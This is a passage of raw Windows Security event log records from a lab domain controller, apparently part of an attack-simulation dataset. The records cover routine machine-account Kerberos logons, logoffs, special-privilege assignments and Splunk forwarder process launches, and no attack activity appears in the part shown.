Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51821
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264080
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B0235
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:47:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264088
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B1051
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:47:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264087
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B1051
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51831
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:47:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264086
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B1051
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:48:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264089
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264091
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x38c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264090
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264092
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1590
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264093
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf48
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264095
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1618
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264094
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264098
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4AD1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:48:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264097
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B4AD1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51844
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:48:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264096
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4AD1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264109
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4F6C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264108
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B505A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264107
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B50A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264106
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B5114
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51849
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264105
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B5114
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264104
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B50A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51848
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264103
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B50A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264102
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B505A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264101
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B505A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264100
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B4F6C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51847
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264099
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4F6C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
